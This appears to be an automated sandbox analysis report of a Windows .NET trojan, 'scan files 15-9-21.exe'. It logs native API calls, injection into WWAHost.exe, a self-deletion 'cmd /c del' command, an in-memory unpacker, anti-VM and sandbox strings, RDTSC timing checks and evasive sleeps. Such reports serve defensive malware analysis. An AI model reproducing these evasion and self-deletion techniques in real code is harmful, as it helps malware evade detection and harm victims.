Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B090 13_2_0367B090
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088CB97 13_2_0088CB97
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00878C60 13_2_00878C60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00872D87 13_2_00872D87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00872D90 13_2_00872D90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C597 13_2_0088C597
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00872FB0 13_2_00872FB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B7E3 13_2_0088B7E3
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C77C 13_2_0088C77C
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0366B150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004181C0 NtCreateFile, 2_2_004181C0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00418270 NtReadFile, 2_2_00418270
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004182F0 NtClose, 2_2_004182F0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004183A0 NtAllocateVirtualMemory, 2_2_004183A0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041826A NtReadFile, 2_2_0041826A
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041839A NtAllocateVirtualMemory, 2_2_0041839A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9710 NtQueryInformationToken,LdrInitializeThunk, 13_2_036A9710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9FE0 NtCreateMutant,LdrInitializeThunk, 13_2_036A9FE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9780 NtMapViewOfSection,LdrInitializeThunk, 13_2_036A9780
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_036A9660
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9650 NtQueryValueKey,LdrInitializeThunk, 13_2_036A9650
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A50 NtCreateFile,LdrInitializeThunk, 13_2_036A9A50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_036A96E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A96D0 NtCreateKey,LdrInitializeThunk, 13_2_036A96D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9540 NtReadFile,LdrInitializeThunk, 13_2_036A9540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_036A9910
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A95D0 NtClose,LdrInitializeThunk, 13_2_036A95D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A99A0 NtCreateSection,LdrInitializeThunk, 13_2_036A99A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9860 NtQuerySystemInformation,LdrInitializeThunk, 13_2_036A9860
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9840 NtDelayExecution,LdrInitializeThunk, 13_2_036A9840
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9760 NtOpenProcess, 13_2_036A9760
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9770 NtSetInformationFile, 13_2_036A9770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA770 NtOpenThread, 13_2_036AA770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9730 NtQueryVirtualMemory, 13_2_036A9730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9B00 NtSetValueKey, 13_2_036A9B00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA710 NtOpenProcessToken, 13_2_036AA710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A97A0 NtUnmapViewOfSection, 13_2_036A97A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA3B0 NtGetContextThread, 13_2_036AA3B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9670 NtQueryInformationProcess, 13_2_036A9670
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A20 NtResumeThread, 13_2_036A9A20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A00 NtProtectVirtualMemory, 13_2_036A9A00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9610 NtEnumerateValueKey, 13_2_036A9610
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A10 NtQuerySection, 13_2_036A9A10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A80 NtOpenDirectoryObject, 13_2_036A9A80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9560 NtWriteFile, 13_2_036A9560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9950 NtQueueApcThread, 13_2_036A9950
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9520 NtWaitForSingleObject, 13_2_036A9520
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AAD30 NtSetContextThread, 13_2_036AAD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A95F0 NtQueryInformationFile, 13_2_036A95F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A99D0 NtCreateProcessEx, 13_2_036A99D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AB040 NtSuspendThread, 13_2_036AB040
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9820 NtEnumerateKey, 13_2_036A9820
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A98F0 NtReadVirtualMemory, 13_2_036A98F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A98A0 NtWriteVirtualMemory, 13_2_036A98A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_008881C0 NtCreateFile, 13_2_008881C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_008882F0 NtClose, 13_2_008882F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00888270 NtReadFile, 13_2_00888270
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_008883A0 NtAllocateVirtualMemory, 13_2_008883A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088826A NtReadFile, 13_2_0088826A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088839A NtAllocateVirtualMemory, 13_2_0088839A
Sample file is different than original file name gathered from version info
Source: scan files 15-9-21.exe, 00000000.00000002.263517285.0000000005A70000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000000.00000002.262075156.0000000002987000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000000.00000002.261491768.000000000060E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000002.00000000.260672638.000000000105E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000002.00000002.343331105.0000000001BDF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe Binary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: scan files 15-9-21.exe Virustotal: Detection: 29%
Source: scan files 15-9-21.exe ReversingLabs: Detection: 26%
Source: scan files 15-9-21.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\scan files 15-9-21.exe 'C:\Users\user\Desktop\scan files 15-9-21.exe'
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe' Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scan files 15-9-21.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@10/4
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_01
Source: scan files 15-9-21.exe, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: scan files 15-9-21.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: scan files 15-9-21.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: scan files 15-9-21.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: WWAHost.pdb source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000D.00000002.525382273.0000000003640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: scan files 15-9-21.exe, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8E622 push 0000001Ah; retf 0_2_04E8E624
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8D131 push 0000001Ah; retf 0_2_04E8D133
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8E8E8 push 0000001Ah; retf 0_2_04E8E907
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8EA5C push 0000001Ah; retf 0_2_04E8EA5E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C949 push ecx; ret 2_2_0041C91E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C949 push ecx; ret 2_2_0041C91E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0040429D pushfd ; iretd 2_2_0040429E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B3B5 push eax; ret 2_2_0041B408
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B46C push eax; ret 2_2_0041B472
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B402 push eax; ret 2_2_0041B408
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B40B push eax; ret 2_2_0041B472
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036BD0D1 push ecx; ret 13_2_036BD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C949 push ecx; ret 13_2_0088C91E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C949 push ecx; ret 13_2_0088C91E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0087429D pushfd ; iretd 13_2_0087429E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B3B5 push eax; ret 13_2_0088B408
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B40B push eax; ret 13_2_0088B472
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B402 push eax; ret 13_2_0088B408
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B46C push eax; ret 13_2_0088B472
Binary contains a suspicious time stamp
Source: scan files 15-9-21.exe Static PE information: 0xEB59C8A3 [Mon Feb 14 13:50:27 2095 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.20919367006

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe' Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: scan files 15-9-21.exe PID: 6752, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\scan files 15-9-21.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\scan files 15-9-21.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 00000000008785E4 second address: 00000000008785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 000000000087897E second address: 0000000000878984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\scan files 15-9-21.exe TID: 6756 Thread sleep time: -35907s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe TID: 6772 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6308 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 4712 Thread sleep time: -38000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004088B0 rdtsc 2_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread delayed: delay time: 35907 Jump to behavior
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000003.00000000.274069496.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.274069496.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.275972062.000000000ECF0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.267087744.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.292230436.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004088B0 rdtsc 2_2_004088B0
Enables debug privileges
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366DB60 mov ecx, dword ptr fs:[00000030h] 13_2_0366DB60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367FF60 mov eax, dword ptr fs:[00000030h] 13_2_0367FF60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03693B7A mov eax, dword ptr fs:[00000030h] 13_2_03693B7A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03693B7A mov eax, dword ptr fs:[00000030h] 13_2_03693B7A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738F6A mov eax, dword ptr fs:[00000030h] 13_2_03738F6A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366DB40 mov eax, dword ptr fs:[00000030h] 13_2_0366DB40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367EF40 mov eax, dword ptr fs:[00000030h] 13_2_0367EF40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738B58 mov eax, dword ptr fs:[00000030h] 13_2_03738B58
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366F358 mov eax, dword ptr fs:[00000030h] 13_2_0366F358
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03664F2E mov eax, dword ptr fs:[00000030h] 13_2_03664F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03664F2E mov eax, dword ptr fs:[00000030h] 13_2_03664F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369E730 mov eax, dword ptr fs:[00000030h] 13_2_0369E730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A70E mov eax, dword ptr fs:[00000030h] 13_2_0369A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A70E mov eax, dword ptr fs:[00000030h] 13_2_0369A70E
